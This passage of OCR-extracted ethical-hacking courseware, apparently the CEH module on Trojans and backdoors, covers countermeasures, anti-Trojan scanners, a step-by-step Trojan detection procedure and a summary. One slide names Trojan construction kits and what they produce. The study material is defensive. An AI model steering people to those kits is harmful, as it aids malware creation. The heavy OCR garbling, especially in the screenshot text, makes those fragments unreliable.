s y s te m f o r c a r r y in g o u t p r e c a r io u s a c tiv it ie s in t h e f u t u r e . In o r d e r t o p r e v e n t such a c tiv it ie s a n d r e d u c e t h e risks a g a in s t T ro ja n s , t h e f o l l o w i n g c o u n t e r m e a s u r e s h o u ld be a d o p t e d : 0 A v o id o p e n i n g e m a il a t t a c h m e n t s r e c e iv e d f r o m u n k n o w n s e n d e r s 0 B lo ck all u n n e c e s s a r y p o r t s a t t h e h o s t a n d f i r e w a l l 0 A v o id a c c e p tin g t h e p r o g r a m s t r a n s f e r r e d b y i n s t a n t m e s s a g in g 0 H a r d e n w e a k , d e f a u l t c o n f i g u r a t i o n s e ttin g s 0 D isab le u n u s e d f u n c t i o n a l i t y i n c lu d in g p r o t o c o l s a n d se rvice s 0 M o n it o r th e in te rn a l n e tw o rk tra ffic fo r odd p o rts o r e n c ry p te d tra ffic M odule 06 Page 989 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 164. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Trojan C ounterm easures (Cont’d) C EH / .Icitifwd Avoid dow nlo adin g and executing applications Install patches and sec u rity updates fo r th e ope ratin g systems and applications •U.U. Scan CDs and flo p p y disks w ith a n tiv iru s fro m u n tru s te d sources ittx jJ s o ftw a re before using Avoid ty p in g th e com m ands b lindly and im ple m e n tin g M anage local w o rk s ta tio n file in te g rity thro u g h Run host-based antivirus, fire w a ll, and in trusio n pre-fa b rica te d program s o r checksums, auditing, and d etection softw are scripts p o rt scanning Copyright © by EG-Gouncil. All Rights ^gSen/ed.;Reproduction is Strictly Prohibited. T r o j a n C o u n t e r m e a s u r e s ( C o n t ’d) 9 A v o id d o w n l o a d i n g a n d e x e c u t in g a p p li c a t i o n s f r o m u n t r u s t e d s o u rc e s 9 In sta ll p a tc h e s a n d s e c u r it y u p d a t e s f o r t h e o p e r a t i n g s y s te m s a n d a p p lic a t io n s 9 Scan CDs a n d f l o p p y disks w i t h a n t i v i r u s s o f t w a r e b e f o r e u sin g 9 R e s tric t p e r m is s io n s w i t h i n t h e d e s k t o p e n v i r o n m e n t t o p r e v e n t m a lic io u s a p p li c a t i o n s i n s t a lla t io n 9 A v o id ty p in g th e com m ands b li n d l y a n d im p le m e n tin g p re -fa b ric a te d p ro g ra m s o r s c r ip ts 9 M a n a g e local w o r k s t a t i o n f ile i n t e g r i t y t h r o u g h c h e c k s u m s , a u d it in g , a n d p o r t s c a n n in g 9 Run local v e rs io n s o f a n t iv ir u s , f i r e w a l l , a n d i n t r u s io n d e t e c t i o n s o f t w a r e o n t h e d e s k t o p M odule 06 Page 990 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 165. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Backdoor Countermeasures CEH U rtifM tUx*l IlMh•( Most commercial anti-virus products can automatically scan and detect backdoor programs before they can cause damage Educate users not to install applications downloaded from untrusted Internet sites and email attachments m Use anti-virus tools such as Windows Defender, McAfee, and Norton to detect and eliminate backdoors Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. B ack d o o r C o u n te rm e a su re s P e rh a p s t h e o ld a d a g e " a n o u n c e o f p r e v e n t i o n is w o r t h a p o u n d o f c u r e " is r e l e v a n t h e r e . S o m e b a c k d o o r c o u n t e r m e a s u r e s a re : 0 The firs t lin e o f d e fe n s e is t o e d u ca te users r e g a r d in g th e d a n g e rs of in s t a llin g a p p li c a t i o n s d o w n l o a d e d f r o m t h e I n t e r n e t , a n d t o be c a u t io u s if t h e y h a v e t o o p e n e m a il a t t a c h m e n t s . 0 T h e s e c o n d lin e o f d e fe n s e can be a n t i v i r u s p r o d u c t s t h a t a re c a p a b le o f r e c o g n iz in g T r o ja n s ig n a tu r e s . T h e u p d a t e s s h o u ld be r e g u la r ly a p p lie d o v e r t h e n e t w o r k . 0 The th ird lin e o f d e fe n s e c o m e s f r o m k e e p in g a p p li c a t i o n v e r s io n s u p d a t e d b y t h e f o l l o w i n g s e c u r it y p a tc h e s a n d v u l n e r a b i l i t y a n n o u n c e m e n t s . Use a n t i v i r u s t o o l s such as W i n d o w s D e f e n d e r , M c A f e e , a n d N o r t o n t o d e t e c t a n d e l i m in a t e b a c k d o o rs . M odule 06 Page 991 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 166. Ethical Hacking and Countermeasures Trojans and Backdoors C o n s tr u c t T ro ja n Exam 312-50 C ertified Ethical Hacker T ro ja n E x e c u tio n T ro ja n H orse C o n s tr u c tio n Kits Trojan Horse construction The tools in these kits can kits help attackers to be dangerous and can P ro g e n ic M a il T ro ja n construct Trojan horses of backfire if not executed C o n s tr u c t io n K it - P M T their choice properly P a n d o ra 's B o x T ro ja n H o rs e C o n s tr u c tio n K it 411 © © Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. T ro ja n H o rs e C o n s tr u c tio n K its T h e s e kits h e lp a t ta c k e r s c o n s t r u c t T r o j a n h o r s e s o f t h e i r c h o ic e . T h e t o o l s in th e s e kits can be d a n g e r o u s a n d can b a c k fir e if n o t e x e c u t e d p r o p e r l y . S o m e o f t h e T r o ja n kits a v a ila b le in t h e w i ld are as f o l lo w s : 0 T h e T r o j a n H o r s e C o n s t r u c t i o n K it v 2 . 0 c o n s is ts o f t h r e e EXE file s : T h c k - tc .e x e , T h c k fp .e x e , a n d T h c k - tb c .e x e . T h c k .e x e is t h e a c tu a l T r o ja n c o n s t r u c t o r . W i t h th is c o m m a n d lin e u t i li t y , t h e a t t a c k e r can c o n s t r u c t a T r o ja n h o r s e o f his o r h e r c h o ic e . T h c k - fp .e x e is a file size m a n i p u l a t o r . W i t h th is , t h e a t t a c k e r can c r e a te file s o f a n y le n g t h , p ad o u t file s t o a s p e c ific le n g t h , o r e v e n a p p e n d a c e r ta in n u m b e r o f b y te s t o a file . T h c k - tb c .e x e w ill t u r n a n y C O M p r o g r a m i n t o a T im e B o m b . Q T h e P r o g e n ic M a i l T r o j a n C o n s t r u c t i o n K it ( P M T ) is a c o m m a n d - l i n e u t i l i t y t h a t a llo w s an a t t a c k e r t o c r e a t e an EXE ( P M .e x e ) t o se n d t o a v i c t i m . 0 P a n d o ra 's Box is a p r o g r a m d e s ig n e d t o c r e a t e T r o j a n s / t i m e b o m b s . M odule 06 Page 992 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 167. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker EH M odule Flow Penetration Testing ^ Anti-Trojan Software **S Trojan Concepts Trojan Infection Countermeasures Types of Trojans Trojan Detection / Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. I M o d u le F lo w lu § P r io r t o th is , w e h a v e d iscu ss e d v a r io u s c o u n t e r m e a s u r e s t h a t o f f e r p r o t e c t i o n t o y o u r c o m p u t e r s y s te m a n d t h e i n f o r m a t i o n s t o r e d o n it a g a in s t v a r io u s m a l w a r e su ch as T r o j a n s a n d b a c k d o o r s . In a d d i t i o n t o th e s e , t h e r e is a n t i - T r o j a n s o f t w a r e t h a t can p r o t e c t y o u r c o m p u t e r s y s te m s a n d o t h e r i n f o r m a t i o n assets a g a in s t T r o ja n s a n d b a c k d o o rs . A n t i - T r o ja n s o f t w a r e d ea ls w i t h r e m o v i n g o r d e a c t i v a t i n g m a l w a r e . Trojan Concepts ,‫• נ‬ s — v‫׳‬ Countermeasures Trojans Infection A n ti- T r o ja n S o ftw a re f ‫י‬ Types of Trojans ^ Penetration Testing — Trojan Detection T his s e c tio n lists a n d d e s c r ib e s v a r io u s a n t i - T r o ja n s o f t w a r e p r o g r a m s . M odule 06 Page 993 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 168. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Anti-Trojan Software: TrojanHunter CEH TrojanHunter is an advanced malware scanner that detects all sorts of malware such as Trojans, spyware, adware, and dialers ' -L e T TrojanHunter M e m o ry s c a n n in g f o r d e te c tin g any m o d ifie d v a ria n t o f a p a r tic u la r b u ild o f a T ro ja n File View FjlEcar Seen J00I5 QjckScan x Help Q Update * cLry TrojanHunter Now -Clcfc Here! Bat R e g is try s c a n n in g fo r d e te c tin g tra c e s o f T roja ns in th e re g is try !j ‫ט‬ b In ifile s c a n n in g fo r d e te c tin g tra c e s o f Troja ns in c o n fig u ra tio n file s ^Char... O W Clow Fo>nd va» ‫ ו׳‬file: CAJser3AdrhVkaoOeto.K0iTOT0Wx.cxcAJ0K.fyv1hwyb (Aocnt.2989) POJ10 VOtdn Ifc: C:V/rtJowstf ysWOM64y1‫׳‬CAFEE. EKE (RIshvare.TVtyPrcwv. IOC) T ro ja n H u n te r G u a rd f o r re s id e n t m e m o ry scan n in g - d e te c t a n y T rojans if th e y m a n a g e t o s ta rt up http ://www. trojanhunter. com Copyright © by EG-CMHCil. All Rights Reserved. Reproduction Is Strictly Prohibited. A n ti-T ro ja n S o ftw a re : T r o ja n H u n te r S o u rc e : h t t p : / / w w w . t r o j a n h u n t e r . c o m T r o j a n H u n t e r is a m a l w a r e s c a n n e r t h a t d e t e c t s a n d r e m o v e s all s o rts o f m a l w a r e , such as T ro ja n s , s p y w a r e , a d w a r e , a n d d ia le rs , f r o m y o u r c o m p u t e r . S o m e o f T r o j a n H u n t e r ' s f e a t u r e s in c lu d e : 0 H ig h -s p e e d file scan e n g in e c a p a b le o f d e t e c t i n g m o d i f i e d T r o j a n s 0 M e m o r y s c a n n in g f o r d e t e c t i n g a n y m o d i f i e d v a r i a n t o f a p a r t i c u l a r b u ild o f a T r o ja n 9 R e g is try s c a n n in g f o r d e t e c t i n g tr a c e s o f T r o ja n s in t h e r e g is t r y Q In ifile s c a n n in g f o r d e t e c t i n g tr a c e s o f T r o ja n s in c o n f i g u r a t i o n files 0 P o r t s c a n n in g f o r d e t e c t i n g o p e n T r o ja n p o r ts 9 T h e A d v a n c e d T r o ja n A n a ly z e r, an e x c lu s iv e f e a t u r e o f T r o j a n H u n t e r , is a b le to fin d w h o l e classes o f T r o ja n s u sin g a d v a n c e d s c a n n in g t e c h n i q u e s 0 T r o j a n H u n t e r G u a r d f o r r e s i d e n t m e m o r y s c a n n in g - d e t e c t a n y T ro ja n s if t h e y m a n a g e to s ta rt up 9 L iv e U p d a te u t i l i t y f o r e f f o r t l e s s r u le s e t u p d a t i n g via t h e I n t e r n e t M odule 06 Page 994 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 169. Ethical Hacking and Countermeasures Trojans and Backdoors 9 Exam 312-50 C ertified Ethical Hacker Process list g iv in g d e ta ils a b o u t e v e r y r u n n i n g p ro c e s s o n t h e s y s te m , in c lu d in g t h e p a th t o t h e a c tu a l e x e c u t a b l e file 0 A c c u r a t e r e m o v a l o f all d e t e c t e d T ro ja n s - e v e n if t h e y a re r u n n i n g o r i f t h e T r o ja n has i n je c te d it s e lf i n t o a n o t h e r p ro c e s s TrojanHunter File V ie w Scan T o o ls 0 Full Scan Quick Scan L j l J H elp ■h Update Objects scanned: a Buy TrojanHunter Now - Click Here! Exit 147791 Trojans found: 2 ‫ , > י‬Clean. Close (U) Found trojan file: C:UsersAdminAppDataV- 0 calTem pVjpx.exeAJpx.fyvzhwyb (Agent.2989) 10 Found trojan file: C:W1ndows$ysWOW64V>1CAFEE.EXE (Rjskware.TinyProxy. 100) FIGURE 6.65: TrojanHunter Anti-Trojan Software M odule 06 Page 995 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 170. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Anti-Trojan Software: Emsisoft Anti-Malware E m s is o ft A n ti- M a lw a r e p r o v id e s Em sisoft PC p r o t e c t io n a g a in s t v iru s e s , CEH ANTI-MALWARE T ro ja n s , s p y w a re , a d w a r e , w o r m s , b o ts , k e y lo g g e rs , a n d r o o t k it s t=J SCAN COMPUTER T w o c o m b in e d s c a n n e rs f o r Scanned objects c le a n in g : A n ti- V ir u s a n d A n ti- *97-163 Dctectcd objects: 317 Reno/eb objects: 0 DrtaiK 62 registry keys ‫ ־‬ircdium ri^< a Scanning: S a r'ro hcd‫־‬ M a lw a r e Oiagntnn T h r e e g u a r d s a g a in s t n e w B in fe c t io n s : f ile g u a rd , b e h a v io r U f O b lo c k e r, a n d s u r f p r o t e c tio n Id ‫&י‬ Id Id S J detected bcaticr?.. Ira ic J ta u a U Y lC f 5J (A) Gt We* gidptp^trdbcato'5■ ■ T ra ic J ta m tre J iM a iY r Svstan P m tn ifd £ Vicr J d c - :* d b ^ * jc r 3.. x Troiaa.Gcncnu5515373 TO ) E 1zn Jde'.e.tedk>.3X> 5.. YD5.TroiaikNooUD (0) (E tz r Jdc'.c. rd lo.aX f S.. JSJWCC(B) M tc ttcM Hv be dtete dr gth 1 jtp to *t ae en e c d uin e 16 regstry keys ‫ ־‬mrdium rW c I Scan finished! If there* jcbeer a yMlw re v n aa foundonvowP . rwi tan C obtainrare rrfbraiatK on** M oboute chO o ctcctrCM al*arc. 2 files ‫ ׳‬highrisk 2 C the 1M11■ tie detected ld< of fifes ■high risk nalw to $ arc rc InarrwInow** w ndorv. 2 fits •Highrisk Cltk o V 0 detected n icv» 1 locittorV ‫־‬o get a Kt o ' «1 kxjtd . eocroorcnts !hat arc •cotcc » the M fll^rtip nam e. S 01!o je yo /ran: to ebct b cts u quatannrw !hendrfc^e T»1irt'M «H r* rMerN" trr e eH — ASout •ftc £ 0twa‫־‬e © 2a03-2D:2ErKB=#r http://www.emsisoft.com Copyright © by EG-COBnci!. All Rights Reserved. Reproduction is Strictly Prohibited. ‫ץ‬ A n ti-T ro ja n S o ftw a re : E m s is o ft A n ti-M a lw a r e S o u rc e : h t t p : / / w w w . e m s i s o f t . c o m E m s is o ft A n t i - M a l w a r e p r o v id e s r e lia b le p r o t e c t i o n o f y o u r s y s t e m a g a in s t v a r io u s t h r e a t s such as v iru s e s , T ro ja n s , s p yw a re , adw are, w orm s, b o ts , k e y lo g g e rs , a nd ro o tk its . It has t w o c o m b in e d s c a n n e rs ( a n t iv ir u s a nd a n t i - m a l w a r e ) f o r c le a n in g in f e c t i o n a nd t h r e e g u a rd s a g a in s t n e w in f e c t io n s : f ile g u a r d , b e h a v i o r b lo c k e r , a n d s u r f p r o t e c t i o n . M odule 06 Page 996 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 171. Ethical Hacking and Countermeasures Trojans and Backdoors E m s is o ft & A TI-M LW R N A AE S A CM TR CN OP E U Scanned objects: r Exam 312-50 C ertified Ethical Hacker 497483 ijLigS / Detected objects: 317 Removed objects: 0 S e a n n i n g : Scan finished! Diagnosis Trace.Reqistrv-Windows Password C ) A PI 9 p i Details 62 registry keys - medium risk A View all detected locations... Trace.Reaistrv.LCP 5.0 fA) Scan fin ishe d! 16 registry keys - medium risk ffl View all detected locations... HI Trace.Reaistrv.Proactive Svstem Password Re<15 reoistry keys - medium risk T 5) View all detected locations... |w‫| ׳‬ Troian.Generic.5515373 (B) 2 files - high risk b ffl View all detected locations... 0 VBS.Troian.Noob.BfB) 2 files - high risk ffl View all detected locations... 2 files - high risk 0 3&AXCCXB) Suspicious files have been detected during the scan. I f there has been any Malware found on your PC, you can obtain more information online about each detected Malware. Click the name o f the detected malware to view the description in a new browser window. V Clide on "View all detected locations’ to get a list o f all found components th a t are related to the Malware name. Select all objects you w ant to quarantine and then didc the Oi iflrantinp v Ip rtp H n h ip rfc ' © 2003-2012 Emsisoft About this softw are FIGURE 6 .6 6 : E m s is o ft A n ti- M a lw a r e M odule 06 Page 997 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 172. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker CEH Anti-Trojan Softwares Anti-Trojan Shield (ATS) a□ □ p H SPYWAREfighter h ttp ://w w w .a tsh ie ld . com http ://w w w .spam fig hter.co m ----------‫- ד‬ Spyware Doctor Anti Trojan Elite h ttp ://w w w .p ctoo ls. com http://w w w .rem ove-trojan.com V' Anti Malware BOCIean ‫חך‬ - [n n| H SUPERAntiSpyware A h ttp ://w w w . com odo. com h ttp ://w w w .su perantispyw are.com Anti Hacker Trojan Remover http://w w w .hide-m y-ip.com h ttp ://w w w .sim plysup. com XoftSpySE Twister Antivirus h ttp://w w w .paretologic.com http://w w w .filseclab .com Copyright © by EG-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited. * A n ti-T ro ja n S o ftw are A n t i - T r o ja n s o ftw a re p r o v id e s p ro te c tio n to your c o m p u te r s ys te m and th e i n f o r m a t i o n s t o r e d o n it by b lo c k in g v a r io u s m a lic io u s t h r e a t s such as T ro ja n s , w o r m s , viru s e s , b a c k d o o r s , m a lic io u s A c t iv e X c o n tr o ls , a n d Java a p p le t s t o e n t e r y o u r s y s te m . A f e w o f t h e a n t i T r o ja n s o f t w a r e p r o g r a m s t h a t a re used f o r t h e p u r p o s e o f k illin g m a l w a r e a re lis te d as f o l lo w s : 9 A n t i - T r o ja n Shield (ATS) a v a ila b le a t h t t p : / / w w w . a t s h i e l d . c o m 9 S p y w a r e D o c t o r a v a ila b le a t h t t p : / / w w w . p c t o o l s . c o m 9 A n t i M a l w a r e BOCIean a v a ila b le a t h t t p : / / w w w . c o m o d o . c o m 9 A n t i H a c k e r a v a ila b le a t h t t p : / / w w w . h i d e - m v - i p . c o m 9 XoftS pyS E a v a ila b le a t h t t p : / / w w w . p a r e t o l o g i c . c o m 9 S P Y W A R E fig h te r a v a ila b le a t h t t p : / / w w w . s p a m f i g h t e r . c o m 9 A n ti T r o ja n Elite a v a ila b le a t h t t p : / / w w w . r e m o v e - t r o i a n . c o m 9 S U P E R A n tiS p y w a re a v a ila b le a t h t t p : / / w w w . s u p e r a n t i s p y w a r e . c o m 9 T r o ia n R e m o v e r a v a ila b le a t h t t p : / / w w w . s i m p l y s u p . c o m 9 T w is t e r A n t i v i r u s a v a ila b le a t h t t p : / / w w w . f i l s e c l a b . c o m M odule 06 Page 998 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 173. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker EH M odule Flow Trojan Concepts Trojan Infection **S Countermeasures Types of Trojans Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. M o d u le F lo w As a p e n e t r a t i o n t e s t e r , y o u s h o u ld f o l l o w t h e s a m e s tr a t e g ie s as t h a t o f an a t t a c k e r t o t e s t y o u r n e t w o r k o r s y s te m a g a in s t T r o j a n a n d b a c k d o o r a t t a c k s . You s h o u ld p e r f o r m all t h e a v a ila b le a t t a c k in g t e c h n i q u e s in c lu d in g t h e n e w l y e m e r g e d a t t a c k in g t e c h n i q u e s . T his a llo w s y o u t o f i g u r e o u t t h e l o o p h o l e s o r v u l n e r a b i l it ie s in t h e t a r g e t o r g a n i z a t i o n 's s e c u r ity . If y o u fin d a n y v u ln e r a b i l it ie s o r lo o p h o le s , y o u s h o u ld s u g g e s t c o u n t e r m e a s u r e s t h a t can m a k e t h e o r g a n i z a t i o n 's s e c u r it y b e t t e r a n d s t r o n g e r . Trojan Concepts Countermeasures — ,‫• נ‬ Trojans Infection !/— V— ‫׳‬ Types of Trojans ‫י ץ‬ |||||r Anti-Trojan Software P e n e t r a t i o n T e s t in g Trojan Detection M odule 06 Page 999 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 174. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Pen Testing for Trojans and Backdoors Use to o ls such as 0 T C P V ie w a n d CEH Scan th e system fo r o p e n p o rts , ru n n in g processes, re g is try e n trie s , C u rrP o rts d e v ic e d riv e rs a n d services 0 If a n y s u s p ic io u s p o rt, process, re g is try e n try , d e v ic e d riv e r o r Scan for running Processes s e rv ic e is d is c o v e re d , c h e c k th e Use to o ls such as a s s o c ia te d e x e c u ta b le file s W h a t's R u n n in g 0 C o lle c t m o re in fo r m a tio n a b o u t th e s e fro m p u b lis h e r's w e b s ite s , if Scan for registry entries Scan for device drivers installed on the computer Scan for Windows services Use to o ls such as j v l 6 P ow er Tools 2012 and PC Tools Registry M echanic av a ila b le , a n d In te rn e t 0 C heck if th e o p e n p o rts a re k n o w n to be o p e n e d b y T ro ja n s in w ild Use to o ls such as D r iv e rV ie w a n d D riv e r D e te c tiv e Use to o ls such as S rv M a n a n d S e rv iW in Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. P e n T e s tin g fo r T r o ja n s a n d B a c k d o o r s Step 1: Scan for open ports O p e n p o r ts a re t h e p r i m a r y s o u r c e s t o la u n c h a tta c k s . T h e r e f o r e , in an a t t e m p t t o m a k e y o u r n e t w o r k s e c u re by c o n d u c t i n g p e n t e s tin g , y o u s h o u ld f i n d t h e o p e n p o r ts a n d p r o t e c t t h e m . You can f i n d t h e u n n e c e s s a r y o p e n p o r t s by s c a n n in g f o r o p e n p o r ts . For th is p u r p o s e , y o u can use t h e t o o l s such as T C P V ie w a n d C u r r P o r ts . Step 2: Scan for running processes M o s t T r o ja n s d o n ' t r e q u i r e t h e u se r t o s t a r t t h e p ro c e s s . T h e y s t a r t a u t o m a t i c a l l y a n d d o n ' t e v e n n o t i f y t h e user. T his k in d o f T r o ja n can be d e t e c t e d b y s c a n n in g f o r r u n n i n g p ro c e s s e s . In o r d e r t o scan f o r r u n n i n g p ro c esse s, y o u can use t o o l s such as W h a t 's R u n n in g , w h i c h scans y o u r s y s te m a n d lists all c u r r e n t l y a c tiv e p r o g r a m s , p ro cesse s, se rvices, m o d u le s , a n d n e t w o r k c o n n e c t i o n s . It a lso in c lu d e s sp e cia l a re as t o d is p la y s t a r t u p p r o g r a m s . Step 3: Scan for registry entries A f e w T ro ja n s ru n in t h e b a c k g r o u n d w i t h o u t a n y n o t i f i c a t i o n t o t h e s y s te m 's user. If y o u w a n t t o t e s t f o r su ch T ro ja n s , t h e n y o u s h o u ld scan f o r r e g is t r y e n tr ie s . This can be d o n e w i t h t h e h e lp o f to o l s such as JV P o w e r T o o ls a n d PC T o o ls R e g is try M e c h a n ic . M odule 06 Page 1000 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 175. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Step 4: Scan for device drivers installed on the computer In o r d e r t o c o n t r o l t h e h a r d w a r e , m o s t m o d e r n OSes use t h e i r o w n d e v ic e d riv e r s . A t t a c k e r s can ta k e a d v a n ta g e o f t h is s i t u a t i o n t o s p re a d T r o j a n s a n d b a c k d o o r s t h r o u g h d e v ic e d r i v e r file s. T r o ja n s s p re a d t h r o u g h d e v ic e d r iv e r s in f e c t t h e d e v ic e d r i v e r file s a n d o t h e r p ro cesse s. Step 5: Scan for W indow s services If y o u f i n d a n y o f t h e W i n d o w s s e rv ic e s s u s p ic io u s , t h e n c h e c k t h e a s s o c ia te d e x e c u ta b le files. T o scan W i n d o w s services, y o u can use t h e t o o l s such as S r v M a n a n d S e r v iW in . M odule 06 Page 1001 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 176. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Step 6: Scan for startup programs S o m e T r o ja n s ru n a u t o m a t i c a l l y w h e n y o u s t a r t W i n d o w s . T h e r e f o r e , scan f o r S t a r t u p p r o g r a m s u sin g t o o l s su ch as S ta r te r, S e c u r ity A u t o R u n , a n d A u t o r u n s a n d c h e c k t h e lis te d s t a r t u p p ro g ra m s and d e te rm in e if all t h e p rogram s in t h e list can be re c o g n iz e d w ith known f u n c t io n a l it ie s . Step 7: Scan for files and folders T h e easy w a y f o r an a t t a c k e r t o h a c k a s y s te m is w i t h t h e use o f file s e m b e d d e d w i t h T r o ja n p a cka ge s. F ire w a lls , IDSes, a nd o t h e r s e c u r it y m e c h a n is m s m a y fa il t o p r e v e n t t h is k in d o f a tta c k . T h e r e f o r e , y o u n e e d t o scan all file s a n d f o l d e r s f o r T r o j a n s a n d b a c k d o o r s . You can scan file s a n d f o l d e r s u sin g t o o l s such as FCIV, TRIPWIRE, SIGVERIF, F astSum , a n d W i n M D 5 . Step 8: Scan for network activities N e t w o r k a c tiv it ie s such as u p lo a d o f b u l k fi l e s o r u n u s u a lly h ig h t r a f f i c g o in g t o a p a r t i c u l a r w e b a d d re s s m a y s o m e t i m e s r e p r e s e n t a sign o f T r o ja n . You s h o u ld scan f o r such n e t w o r k a c t i v it ie s . T o o ls such as Capsa N e t w o r k A n a ly z e r can be used f o r t h is p u r p o s e . M odule 06 Page 1002 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 177. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Step 9: Scan for modification to OS files C he ck t h e c r itic a l OS file m o d ific a tio n o r m a n ip u la tio n u sin g t o o l s such as TR IP W IR E o r m a n u a l ly c o m p a r e hash v a lu e s if y o u h a v e a b a c k u p c o p y . Step 10: Run Trojan Scanner to detect Trojans T r o ja n s c a n n e rs such as T r o j a n H u n t e r a n d E m s is o f t A n t i - M a l w a r e a re r e a d ily a v a ila b le in t h e m a r k e t . You can in s ta ll a n d ru n t h o s e T r o ja n s c a n n e rs t o d e t e c t T ro ja n s o n y o u r s y s te m . M odule 06 Page 1003 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 178. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Pen Testing for Trojans and Backdoors (C o n t’d) 0 I f T r o ja n s D o c u m e n t a ll t h e f in d in g s ••> NO a re d e te c te d ? CEH D o c u m e n t a ll y o u r fin d in g s in p re v io u s steps; it h e lp s in d e te rm in in g th e n e x t a c tio n if A . T roja ns a re id e n tifie d in th e system YES 0 Is o la te in fe c te d s y s te m fro m th e n e tw o rk im m e d ia te ly to p re v e n t f u r t h e r in fe c tio n Is o la te t h e m a c h in e fro m n e tw o rk 9 S a n itiz e t h e c o m p le te s y s te m fo r T roja ns u sing an u p d a te d a n ti-v iru s s o lu tio n t o c le a n T ro ja n s Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. P e n T e s t i n g f o r T r o j a n s a n d B a c k d o o r s ( C o n t ’d) Step 11: Document all the findings O n c e y o u c o n d u c t all p o s s ib le te s ts t o f i n d t h e T r o ja n s , d o c u m e n t all t h e fi n d i n g s t h a t y o u o b t a i n a t e ach t e s t f o r a n a ly s is a n d c h e c k if t h e r e is a n y sign o f a T r o ja n . Step 12: Isolate the machine from the network W h e n y o u fin d a T r o j a n o n a m a c h in e , y o u s h o u ld is o la te t h e m a c h in e i m m e d i a t e l y f r o m t h e n e t w o r k b e f o r e it ta k e s c o n t r o l o v e r o t h e r s y s te m s in t h e n e t w o r k . C he ck w h e t h e r t h e a n t iv ir u s s o f t w a r e is u p d a t e d o r n o t. If t h e a n t i v i r u s is n o t u p d a t e d , t h e n u p d a t e it a n d t h e n r u n i t t o scan t h e s y s te m . If t h e a n t iv ir u s is a lr e a d y u p d a t e d , t h e n f i n d o t h e r a n t i v i r u s s o lu t i o n s t o c le a n T r o ja n s . M odule 06 Page 1004 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 179. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker M odule Su m m ary ‫ב‬ C EH Trojans are malicious pieces of code that carry cracker software to a target system □ They are used primarily to gain and retain access on the target system □ They often reside deep in the system and make registry changes that allow them to meet their purpose as a remote administration tool □ Popular Trojans include MoSucker, Rem oteByM ail, Illusion Bot, and Zeus □ Awareness and preventive measures are the best defences against Trojans □ Using anti-Trojan tools such as TrojanHunter and Emsisoft Anti-Malware to detect and eliminate Trojans Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u le S u m m a ry 9 T ro ja n s a re m a lic io u s p ie c e s o f c o d e t h a t c a r r y c r a c k e r s o f t w a r e t o a t a r g e t s y s te m . © T h e y a re used p r i m a r i l y t o g ain a n d r e ta in access o n t h e t a r g e t s y s te m . 9 T h e y o f t e n re s id e d e e p in t h e s y s te m a n d m a k e r e g is t r y c h a n g e s t h a t a l l o w t h e m t o m e e t t h e i r p u r p o s e as a r e m o t e a d m i n i s t r a t i o n t o o l . 0 P o p u la r T r o ja n s in c lu d e M o S u c k e r , R e m o t e B y M a i l, Illu s io n Bo t, a nd Zeus. 0 A w a r e n e s s a n d p r e v e n t i v e m e a s u r e s a re t h e b e s t d e fe n c e s a g a in s t T ro ja n s . 9 U sing a n t i - T r o ja n t o o l s such as T r o j a n H u n t e r a n d E m s is o ft A n t i - M a l w a r e t o d e t e c t a nd e l i m i n a t e T ro ja n s . M odule 